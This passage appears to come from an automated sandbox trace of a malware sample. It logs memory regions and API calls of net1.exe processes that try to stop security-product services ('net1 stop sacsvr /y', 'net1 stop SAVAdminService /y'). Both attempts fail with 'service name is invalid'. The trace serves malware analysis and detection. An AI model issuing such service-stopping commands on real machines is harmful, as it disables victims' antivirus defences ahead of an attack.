mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9616 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9665 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 730 os_tid = 0xf18 [0109.240] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefcd0 | out: lpSystemTimeAsFileTime=0xefcd0*(dwLowDateTime=0xf6431cf0, dwHighDateTime=0x1d48689)) [0109.240] GetCurrentProcessId () returned 0xf04 [0109.240] GetCurrentThreadId () returned 0xf18 [0109.240] GetTickCount () returned 0x2507f [0109.240] QueryPerformanceCounter (in: lpPerformanceCount=0xefcd8 | out: lpPerformanceCount=0xefcd8*=1815615800000) returned 1 [0109.241] GetModuleHandleW (lpModuleName=0x0) returned 0xff480000 [0109.241] __set_app_type (_Type=0x1) [0109.241] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff499c9c) returned 0x0 [0109.241] __getmainargs (in: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788, _DoWildCard=0, _StartInfo=0xff4a479c | out: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788) returned 0 [0109.242] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.242] GetConsoleOutputCP () returned 0x1b5 [0109.356] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4acec0 | out: lpCPInfo=0xff4acec0) returned 1 [0109.356] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0109.358] sprintf_s (in: _DstBuf=0xefc78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0109.358] setlocale (category=0, locale=".437") returned="English_United States.437" [0109.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.360] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0109.360] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sacsvr /y" [0109.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefa10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0109.360] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0109.360] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefc68 | out: Buffer=0xefc68*=0x134d40) returned 0x0 [0109.360] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefc68 | out: Buffer=0xefc68*=0x13c0e0) returned 0x0 [0109.360] _fileno (_File=0x7fefdba2a80) returned 0 [0109.360] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0109.361] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0109.361] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0109.361] _wcsicmp (_String1="config", _String2="stop") returned -16 [0109.361] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0109.361] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0109.361] _wcsicmp (_String1="file", _String2="stop") returned -13 [0109.361] _wcsicmp (_String1="files", _String2="stop") returned -13 [0109.361] _wcsicmp (_String1="group", _String2="stop") returned -12 [0109.361] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0109.361] _wcsicmp (_String1="help", _String2="stop") returned -11 [0109.361] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0109.361] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0109.361] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0109.361] _wcsicmp (_String1="session", _String2="stop") returned -15 [0109.361] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0109.361] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0109.361] _wcsicmp (_String1="share", _String2="stop") returned -12 [0109.361] _wcsicmp (_String1="start", _String2="stop") returned -14 [0109.361] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0109.361] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0109.361] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0109.361] _wcsicmp (_String1="accounts", _String2="sacsvr") returned -18 [0109.361] _wcsicmp (_String1="computer", _String2="sacsvr") returned -16 [0109.362] _wcsicmp (_String1="config", _String2="sacsvr") returned -16 [0109.362] _wcsicmp (_String1="continue", _String2="sacsvr") returned -16 [0109.362] _wcsicmp (_String1="cont", _String2="sacsvr") returned -16 [0109.362] _wcsicmp (_String1="file", _String2="sacsvr") returned -13 [0109.362] _wcsicmp (_String1="files", _String2="sacsvr") returned -13 [0109.362] _wcsicmp (_String1="group", _String2="sacsvr") returned -12 [0109.362] _wcsicmp (_String1="groups", _String2="sacsvr") returned -12 [0109.362] _wcsicmp (_String1="help", _String2="sacsvr") returned -11 [0109.362] _wcsicmp (_String1="helpmsg", _String2="sacsvr") returned -11 [0109.362] _wcsicmp (_String1="localgroup", _String2="sacsvr") returned -7 [0109.362] _wcsicmp (_String1="pause", _String2="sacsvr") returned -3 [0109.362] _wcsicmp (_String1="session", _String2="sacsvr") returned 4 [0109.362] _wcsicmp (_String1="sessions", _String2="sacsvr") returned 4 [0109.362] _wcsicmp (_String1="sess", _String2="sacsvr") returned 4 [0109.362] _wcsicmp (_String1="share", _String2="sacsvr") returned 7 [0109.362] _wcsicmp (_String1="start", _String2="sacsvr") returned 19 [0109.362] _wcsicmp (_String1="stats", _String2="sacsvr") returned 19 [0109.362] _wcsicmp (_String1="statistics", _String2="sacsvr") returned 19 [0109.362] _wcsicmp (_String1="stop", _String2="sacsvr") returned 19 [0109.362] _wcsicmp (_String1="time", _String2="sacsvr") returned 1 [0109.362] _wcsicmp (_String1="user", _String2="sacsvr") returned 2 [0109.362] _wcsicmp (_String1="users", _String2="sacsvr") returned 2 [0109.362] _wcsicmp (_String1="msg", _String2="sacsvr") returned -6 [0109.362] _wcsicmp (_String1="messenger", _String2="sacsvr") returned -6 [0109.362] _wcsicmp (_String1="receiver", _String2="sacsvr") returned -1 [0109.362] _wcsicmp (_String1="rcv", _String2="sacsvr") returned -1 [0109.362] _wcsicmp (_String1="netpopup", _String2="sacsvr") returned -5 [0109.362] _wcsicmp (_String1="redirector", _String2="sacsvr") returned -1 [0109.362] _wcsicmp (_String1="redir", _String2="sacsvr") returned -1 [0109.362] _wcsicmp (_String1="rdr", _String2="sacsvr") returned -1 [0109.362] _wcsicmp (_String1="workstation", _String2="sacsvr") returned 4 [0109.362] _wcsicmp (_String1="work", _String2="sacsvr") returned 4 [0109.362] _wcsicmp (_String1="wksta", _String2="sacsvr") returned 4 [0109.362] _wcsicmp (_String1="prdr", _String2="sacsvr") returned -3 [0109.362] _wcsicmp (_String1="devrdr", _String2="sacsvr") returned -15 [0109.363] _wcsicmp (_String1="lanmanworkstation", _String2="sacsvr") returned -7 [0109.363] _wcsicmp (_String1="server", _String2="sacsvr") returned 4 [0109.363] _wcsicmp (_String1="svr", _String2="sacsvr") returned 21 [0109.363] _wcsicmp (_String1="srv", _String2="sacsvr") returned 17 [0109.363] _wcsicmp (_String1="lanmanserver", _String2="sacsvr") returned -7 [0109.363] _wcsicmp (_String1="alerter", _String2="sacsvr") returned -18 [0109.363] _wcsicmp (_String1="netlogon", _String2="sacsvr") returned -5 [0109.363] _wcsupr (in: _String="sacsvr" | out: _String="SACSVR") returned="SACSVR" [0109.363] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x13c900 [0109.367] GetServiceKeyNameW (in: hSCManager=0x13c900, lpDisplayName="SACSVR", lpServiceName=0xff4a5750, lpcchBuffer=0xefb88 | out: lpServiceName="", lpcchBuffer=0xefb88) returned 0 [0109.368] _wcsicmp (_String1="msg", _String2="SACSVR") returned -6 [0109.368] _wcsicmp (_String1="messenger", _String2="SACSVR") returned -6 [0109.368] _wcsicmp (_String1="receiver", _String2="SACSVR") returned -1 [0109.368] _wcsicmp (_String1="rcv", _String2="SACSVR") returned -1 [0109.368] _wcsicmp (_String1="redirector", _String2="SACSVR") returned -1 [0109.369] _wcsicmp (_String1="redir", _String2="SACSVR") returned -1 [0109.369] _wcsicmp (_String1="rdr", _String2="SACSVR") returned -1 [0109.369] _wcsicmp (_String1="workstation", _String2="SACSVR") returned 4 [0109.369] _wcsicmp (_String1="work", _String2="SACSVR") returned 4 [0109.369] _wcsicmp (_String1="wksta", _String2="SACSVR") returned 4 [0109.369] _wcsicmp (_String1="prdr", _String2="SACSVR") returned -3 [0109.369] _wcsicmp (_String1="devrdr", _String2="SACSVR") returned -15 [0109.369] _wcsicmp (_String1="lanmanworkstation", _String2="SACSVR") returned -7 [0109.369] _wcsicmp (_String1="server", _String2="SACSVR") returned 4 [0109.369] _wcsicmp (_String1="svr", _String2="SACSVR") returned 21 [0109.369] _wcsicmp (_String1="srv", _String2="SACSVR") returned 17 [0109.369] _wcsicmp (_String1="lanmanserver", _String2="SACSVR") returned -7 [0109.369] _wcsicmp (_String1="alerter", _String2="SACSVR") returned -18 [0109.369] _wcsicmp (_String1="netlogon", _String2="SACSVR") returned -5 [0109.369] NetServiceControl (in: servername=0x0, service="SACSVR", opcode=0x0, arg=0x0, bufptr=0xefb90 | out: bufptr=0xefb90) returned 0x889 [0109.370] wcscpy_s (in: _Destination=0xff4a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0109.370] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0109.371] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0109.372] GetFileType (hFile=0xb) returned 0x2 [0109.373] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa58 | out: lpMode=0xefa58) returned 1 [0109.373] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefa50, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0xefa50*=0x1e) returned 1 [0109.373] GetFileType (hFile=0xb) returned 0x2 [0109.373] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa58 | out: lpMode=0xefa58) returned 1 [0109.374] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefa50, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0xefa50*=0x2) returned 1 [0109.374] _ultow (in: _Dest=0x889, _Radix=981696 | out: _Dest=0x889) returned="2185" [0109.374] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0109.374] GetFileType (hFile=0xb) returned 0x2 [0109.374] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa58 | out: lpMode=0xefa58) returned 1 [0109.375] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xefa50, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0xefa50*=0x34) returned 1 [0109.375] GetFileType (hFile=0xb) returned 0x2 [0109.375] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa58 | out: lpMode=0xefa58) returned 1 [0109.375] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefa50, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0xefa50*=0x2) returned 1 [0109.376] NetApiBufferFree (Buffer=0x134d40) returned 0x0 [0109.376] NetApiBufferFree (Buffer=0x13c0e0) returned 0x0 [0109.376] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sacsvr /y" [0109.376] exit (_Code=2) Process: id = "254" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5eb51000" os_pid = "0xe40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "248" os_parent_pid = "0x12b4" cmd_line = "C:\\Windows\\system32\\net1 stop SAVAdminService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9517 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9518 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9519 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9520 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 9521 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9522 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9523 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9524 start_va = 0xff480000 end_va = 0xff4b2fff entry_point = 0xff480000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9525 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9526 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9527 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9528 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9529 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 9530 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9531 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9617 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9618 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9619 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9620 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 9621 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 9622 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9623 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9624 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9625 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9626 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9627 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9628 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9629 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9630 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9631 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9632 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9633 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9634 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9635 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9636 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9637 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9638 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9639 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9666 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 731 os_tid = 0x1384 [0109.248] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fbf0 | out: lpSystemTimeAsFileTime=0x10fbf0*(dwLowDateTime=0xf6457e50, dwHighDateTime=0x1d48689)) [0109.248] GetCurrentProcessId () returned 0xe40 [0109.248] GetCurrentThreadId () returned 0x1384 [0109.248] GetTickCount () returned 0x2508f [0109.248] QueryPerformanceCounter (in: lpPerformanceCount=0x10fbf8 | out: lpPerformanceCount=0x10fbf8*=1815616700000) returned 1 [0109.250] GetModuleHandleW (lpModuleName=0x0) returned 0xff480000 [0109.250] __set_app_type (_Type=0x1) [0109.250] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff499c9c) returned 0x0 [0109.250] __getmainargs (in: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788, _DoWildCard=0, _StartInfo=0xff4a479c | out: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788) returned 0 [0109.250] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.250] GetConsoleOutputCP () returned 0x1b5 [0109.252] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4acec0 | out: lpCPInfo=0xff4acec0) returned 1 [0109.252] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0109.264] sprintf_s (in: _DstBuf=0x10fb98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0109.265] setlocale (category=0, locale=".437") returned="English_United States.437" [0109.275] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.275] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0109.275] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SAVAdminService /y" [0109.275] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f930, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0109.275] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0109.276] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10fb88 | out: Buffer=0x10fb88*=0x204d50) returned 0x0 [0109.276] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10fb88 | out: Buffer=0x10fb88*=0x20c100) returned 0x0 [0109.276] _fileno (_File=0x7fefdba2a80) returned 0 [0109.276] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0109.276] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0109.276] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0109.276] _wcsicmp (_String1="config", _String2="stop") returned -16 [0109.276] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0109.276] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0109.276] _wcsicmp (_String1="file", _String2="stop") returned -13 [0109.276] _wcsicmp (_String1="files", _String2="stop") returned -13 [0109.276] _wcsicmp (_String1="group", _String2="stop") returned -12 [0109.276] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0109.276] _wcsicmp (_String1="help", _String2="stop") returned -11 [0109.276] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0109.276] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0109.276] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0109.276] _wcsicmp (_String1="session", _String2="stop") returned -15 [0109.277] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0109.277] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0109.277] _wcsicmp (_String1="share", _String2="stop") returned -12 [0109.277] _wcsicmp (_String1="start", _String2="stop") returned -14 [0109.277] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0109.277] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0109.277] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0109.277] _wcsicmp (_String1="accounts", _String2="SAVAdminService") returned -18 [0109.277] _wcsicmp (_String1="computer", _String2="SAVAdminService") returned -16 [0109.277] _wcsicmp (_String1="config", _String2="SAVAdminService") returned -16 [0109.277] _wcsicmp (_String1="continue", _String2="SAVAdminService") returned -16 [0109.277] _wcsicmp (_String1="cont", _String2="SAVAdminService") returned -16 [0109.277] _wcsicmp (_String1="file", _String2="SAVAdminService") returned -13 [0109.277] _wcsicmp (_String1="files", _String2="SAVAdminService") returned -13 [0109.277] _wcsicmp (_String1="group", _String2="SAVAdminService") returned -12 [0109.277] _wcsicmp (_String1="groups", _String2="SAVAdminService") returned -12 [0109.277] _wcsicmp (_String1="help", _String2="SAVAdminService") returned -11 [0109.277] _wcsicmp (_String1="helpmsg", _String2="SAVAdminService") returned -11 [0109.277] _wcsicmp (_String1="localgroup", _String2="SAVAdminService") returned -7 [0109.277] _wcsicmp (_String1="pause", _String2="SAVAdminService") returned -3 [0109.277] _wcsicmp (_String1="session", _String2="SAVAdminService") returned 4 [0109.277] _wcsicmp (_String1="sessions", _String2="SAVAdminService") returned 4 [0109.277] _wcsicmp (_String1="sess", _String2="SAVAdminService") returned 4 [0109.277] _wcsicmp (_String1="share", _String2="SAVAdminService") returned 7 [0109.277] _wcsicmp (_String1="start", _String2="SAVAdminService") returned 19 [0109.277] _wcsicmp (_String1="stats", _String2="SAVAdminService") returned 19 [0109.277] _wcsicmp (_String1="statistics", _String2="SAVAdminService") returned 19 [0109.277] _wcsicmp (_String1="stop", _String2="SAVAdminService") returned 19 [0109.277] _wcsicmp (_String1="time", _String2="SAVAdminService") returned 1 [0109.277] _wcsicmp (_String1="user", _String2="SAVAdminService") returned 2 [0109.278] _wcsicmp (_String1="users", _String2="SAVAdminService") returned 2 [0109.278] _wcsicmp (_String1="msg", _String2="SAVAdminService") returned -6 [0109.278] _wcsicmp (_String1="messenger", _String2="SAVAdminService") returned -6 [0109.278] _wcsicmp (_String1="receiver", _String2="SAVAdminService") returned -1 [0109.278] _wcsicmp (_String1="rcv", _String2="SAVAdminService") returned -1 [0109.278] _wcsicmp (_String1="netpopup", _String2="SAVAdminService") returned -5 [0109.278] _wcsicmp (_String1="redirector", _String2="SAVAdminService") returned -1 [0109.278] _wcsicmp (_String1="redir", _String2="SAVAdminService") returned -1 [0109.278] _wcsicmp (_String1="rdr", _String2="SAVAdminService") returned -1 [0109.278] _wcsicmp (_String1="workstation", _String2="SAVAdminService") returned 4 [0109.278] _wcsicmp (_String1="work", _String2="SAVAdminService") returned 4 [0109.278] _wcsicmp (_String1="wksta", _String2="SAVAdminService") returned 4 [0109.278] _wcsicmp (_String1="prdr", _String2="SAVAdminService") returned -3 [0109.278] _wcsicmp (_String1="devrdr", _String2="SAVAdminService") returned -15 [0109.278] _wcsicmp (_String1="lanmanworkstation", _String2="SAVAdminService") returned -7 [0109.278] _wcsicmp (_String1="server", _String2="SAVAdminService") returned 4 [0109.278] _wcsicmp (_String1="svr", _String2="SAVAdminService") returned 21 [0109.278] _wcsicmp (_String1="srv", _String2="SAVAdminService") returned 17 [0109.278] _wcsicmp (_String1="lanmanserver", _String2="SAVAdminService") returned -7 [0109.278] _wcsicmp (_String1="alerter", _String2="SAVAdminService") returned -18 [0109.278] _wcsicmp (_String1="netlogon", _String2="SAVAdminService") returned -5 [0109.278] _wcsupr (in: _String="SAVAdminService" | out: _String="SAVADMINSERVICE") returned="SAVADMINSERVICE" [0109.279] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x20ce10 [0109.377] GetServiceKeyNameW (in: hSCManager=0x20ce10, lpDisplayName="SAVADMINSERVICE", lpServiceName=0xff4a5750, lpcchBuffer=0x10faa8 | out: lpServiceName="", lpcchBuffer=0x10faa8) returned 0 [0109.378] _wcsicmp (_String1="msg", _String2="SAVADMINSERVICE") returned -6 [0109.378] _wcsicmp (_String1="messenger", _String2="SAVADMINSERVICE") returned -6 [0109.378] _wcsicmp (_String1="receiver", _String2="SAVADMINSERVICE") returned -1 [0109.378] _wcsicmp (_String1="rcv", _String2="SAVADMINSERVICE") returned -1 [0109.378] _wcsicmp (_String1="redirector", _String2="SAVADMINSERVICE") returned -1 [0109.379] _wcsicmp (_String1="redir", _String2="SAVADMINSERVICE") returned -1 [0109.379] _wcsicmp (_String1="rdr", _String2="SAVADMINSERVICE") returned -1 [0109.379] _wcsicmp (_String1="workstation", _String2="SAVADMINSERVICE") returned 4 [0109.379] _wcsicmp (_String1="work", 